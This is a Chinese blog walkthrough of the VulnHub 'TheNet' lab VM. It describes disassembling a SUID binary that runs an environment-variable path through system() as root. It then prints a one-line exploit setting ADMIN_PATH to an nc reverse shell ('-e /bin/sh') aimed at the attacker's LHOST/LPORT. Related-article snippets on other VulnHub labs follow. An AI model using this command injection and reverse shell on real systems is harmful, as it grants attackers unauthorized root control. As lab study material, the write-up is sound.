VulnHub-TheNe suid提权

最新推荐文章于 2024-06-09 16:36:36 发布
最新推荐文章于 2024-06-09 16:36:36 发布
阅读量83 收藏
点赞数
分类专栏: 打靶 安全 文章标签: 系统安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51151193/article/details/124846149
版权

靶机地址: https://download.vulnhub.com/thenet/TheNet.ova

前期打点非常容易,只需要进行目录枚举,结合源码审计,就能找到靶机作者给出的提示信息,拿到SSH登陆的帐号和密码

打点突破边界后,提权阶段也是非常的有意思,进入目标系统后就能看到一个flag{1}和一个设置了suid权限的可执行文件cpw
在这里插入图片描述

已经很明显,这是靶机作者故意留下的,就是让我们利用 suid 进行提权
把文件拿出来,进行反汇编
在这里插入图片描述

代码执行过程中会对当前环境变量进行枚举,然后进行判断,是否有变量名为“ADMIN_PATH",如果有的话就分配一块内存空间,再将 s 指向变量值和 /changepw 拼接后的字符串,设置setuid(0),将 s 丢进 system 执行
现在思路已经清晰了,只需要构建一个环境变量,名为"ADMIN_PATH",值设置为一个反弹 shell,就可以了
这里我选择使用 nc 进行反弹,师傅们也可以使用其他反弹 shell
构造 exp 这里我选择单独将空格使用单引号引起来
export ADMIN_PATH=/tmp/nc’ ‘LHOST’ ‘LPORT’ ‘-e’ '/bin/sh;
因为系统自带的 nc 无法使用 -e 参数,所以我上传了一个 nc 到 /tmp 目录下
在这里插入图片描述

执行 cpw 文件, 拿到 root 权限,查看到第二个 flag
在这里插入图片描述

f0_f0_f0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【Vulnhub靶机渗透测试】之DC-1 (SUID
Pluto.的博客
12-27 785
文章目录Vulnhub靶机渗透测试DC-11. 信息收集2. 漏洞利用 Vulnhub靶机渗透测试 DC-1 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-1,292/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.131。 1. 信息收集 使用 nmap 扫描 192.168.40.0/24 网段存活主机 nmap -sP 192.168.40.0/24 简单分析可知,靶机ip为 192
Vulnhub 之 DC-5
ST0new的博客
07-23 680
文章目录前言作者描述复现环境开始复现查看flag 前言 本靶机只做学习使用,不要将其利用于非法途径。 终于来到了倒数第二关,这一关将难度增加,所以我们需要借助搜索工具来帮助我们完成 作者描述 DC-5是另一个专门建造的脆弱实验室,目的是获得渗透测试领域的经验。 这个计划是为了让DC-5更上一层楼,所以这对初学者来说可能不太好,但对有中级或更好经验的人来说应该没问题。时间会证明一切(反馈也会证明)...
Vulnhub Typhoon-v1.02
weixin_38659379的博客
04-10 1007
靶机下载地址: Download: https://drive.google.com/file/d/1rwxlRMOJJ8GGj2VshAOvgqgUM_Z-OV9z/view Download (Torrent): https://download.vulnhub.com/typhoon/Typhoon-v1.02.ova.torrent ( Magnet) 靶机渗透难度相对简单,利用方式很多...
[Vulnhub] VulnOS version 2 Linux内核
weixin_45605352的博客
05-17 242
0x00 环境搭建 靶场地址:http://www.vulnhub.com/entry/vulnos-2,147/ 下载之后用 VBoxManage.exe 将 .vdi 格式转换成 .vmdk 格式,用 VMware 打开: VboxManage.exe clonehd 原文件.vdi 目标文件.vmdk --format VMDK 以桥接模式开机后搭建完成: 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,在用nmap -sV -p- ip来探测端口: 发现开放了 22端口(
【VulnHub系列】AI-Web-1 漏洞
初学者L_言的博客
07-12 627
一、环境 靶机: https://www.vulnhub.com/entry/ai-web-1,353/ 攻击机: kali 二、具体步骤 2.1 主机发现 nmap -sP ip段 2.2 端口服务扫描 nmap -sV -A -p- 192.168.47.152 Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd | http-robots.txt: 2 disal
vulnhub prime1通关详细思路
m0_61506558的博客
09-24 744
本次模拟渗透测试的流程,从确定目标域名、IP 、主机发现,进行信息收集域名、IP、端口、目录扫描、搜索引擎、网络空间搜索引擎、Git…… 漏洞扫描,利用msf集成的工具,漏洞利用,最终拿到root用户。1、主机发现我的攻击机选择的是kali,在本机我们可以试试找它的网段,方便Nmap进行扫描,我本地使用的是NAT技术,这样我们就可以找到它的网段模式描述特点场景Bridge桥接虚拟机使用物理机的网卡(有线或者无线),不用虚拟网卡,占用一个IP,需要配置IP以后访问互联网。
【vulnhub】Lampiao渗透实战(脏牛
qq_45300786的博客
04-18 798
总结 1、该靶机的WEB系统的建站CMS是drupal 7,时刻关注一些cms漏洞 2、在没有思路的时候,try yourself !往往有不同的收获 3、再练练脏牛。。。 Lampiao靶机百度云下载 链接:https://pan.baidu.com/s/1_TDcubSNj7z5JweaTxjgKQ 取码:g3fn 靶机:192.168.100.129 kali:192.168.100.23 其他的我就不说了。详细过程请看Lampiao渗透实战 这里我就说一下,需要特别注意的地方。 这里我是把没有
vulnhub渗透系列之DC(一) :内含suid的三种方法
来到了学渣的博客
01-25 2945
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.这个题我觉得对刚入门的我来说,十分的困难,参考了很多资料做了很长的时间才解决 2.对端口信息扫描,探测存在22和80端口,但22端口ssh爆破无果,登录网站后发现是Drupal框 架,版本是7.x但不确定是哪个x 3.利用searchsp...
Vulnhub - JANGOW: 1.0.1
shuozhuqiu6452的博客
12-05 128
vulnhub - JANGOW: 1.0.1
27-通过调用门实现
网络安全
06-27 1301
参考资料:9-调用门(无参) 1. 什么是调用门 在之前的学习中,JMP FAR指令实现代码跨段的本质是修改CS段寄存器,并不会改变程序的特级别(即修改CPL的值),如果我们即想要实现代码跨段和的话,就需要用到调用门。 调用门是CPU供的一个功能,它允许一个3环(CPL=3)的程序通过这扇“门”来修改CS段寄存器并实现到0环(CPL=0),实际上调用门是一个系统段描述...
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑示例(一)
whyrookie的博客
04-15 7062
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Sh...
『vulnhub系列』dpwwn-1—Linux计划任务
good good study
03-21 1927
如果存在以root限执行的计划任务,且计划任务中存在脚本,并且脚本其他用户拥有写入限则可以通过计划任务
vulnhub渗透系列之zico2(内含zip和脏牛
来到了学渣的博客
02-02 2139
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 我这个靶机总结了两种反弹shell和两种的方法(python反shell和zip、php反shell和 脏牛)并且有我错误的经验。希望能帮助到你们 实验过程总结 1.探测发现开放端口22、80、111端口,发现页面存在文件包含漏洞,dirb目...
vulnhub - DC6 (考点:WordPress安全&插件漏洞利用/linux知识/nmap
冬萍子癸水
04-23 636
https://www.vulnhub.com/entry/dc-6,315/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 下载这个靶机,并在下载页面看作者的示。按示修改/etc/hosts,以及暴力破解的字典修改。 nmap 看到80和22, 80进web搜集信息,22想到ssh登录拿shell 进80发现就是WordPress。 首先想到wpscan扫描 然后dirb...
记一次vulnhub|渗透测试DC-4(常规和非预期思路)
crispr的博客
02-02 941
Five86-2 0X01 Main Point 1.Burpsuite爆破模块进行简单爆破 2.Hydra爆破进行SSH连接 3.CVE-2019-10149–exim漏洞进行本地
Vulnhub-DC-6靶机实战(Nmap)
御七彩虹猫
05-19 1497
Vulnhub-DC-6靶机实战(Nmap)
实战Linux下三种不同方式的技巧
热门推荐
fly小灰灰的专栏
03-17 1万+
介绍在渗透测试或者漏洞评估的过程中,是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞VulnOS version 2是VulHub上的一个Linux练习,当打开虚拟机后,可以看到 获取到低限SHELL后我们通常做下面几件事1.检测操作系
Linux系统安全及应用
2401_84618124的博客
06-07 787
su 用户名 :在终端中切换已知密码的用户,root用户切换到普通用户默认不需要密码,普通用户发起的切换需要目标账户的密码,su切换用户不会改变环境变量,用的还是之前的用户shell,是不完全切换。su -用户名:登录式切换,读取目标用户的配置文件,切换到家目录,如果在root用户下,su 相当于刷新,如果是普通用户,就是切换回root。5.1 sudo命令 ,相当于给普通用户赋,配置sudo需要对/etc/sudoers/进行编辑,进入配置,注释掉图中两行。
ARM-V9 RME(Realm Management Extension)系统架构之系统安全能力的MPAM
最新发布
security²-卢鸿波-安全二次方
06-09 275
ARM-V9 RME(Realm Management Extension)系统架构之系统安全能力的MPAM
已知如下一组规则:r1:ifE3andE4orE5thenE1(0.8)r2:if E1 then H(0.6) r3:if E2 then H (0.7) r4:if E6 then H(0.8)已知CF(E3)=0.9,CF(E4)=0.8,CF(E5)=0.6,CF(E2)=0.6CF(E6)=0.4。用确定性理论求:CF(H)=?
05-23
根据确定性理论,先计算出每个规则的置信度(CF): CF(r1) = min(CF(E3), CF(E4), CF(E5)) = min(0.9, 0.8, 0.6) = 0.6 CF(r2) = CF(E1) = 0.8 (由于r1的置信度为0.6,小于0.8,因此不考虑r1) ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0_f0_f0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值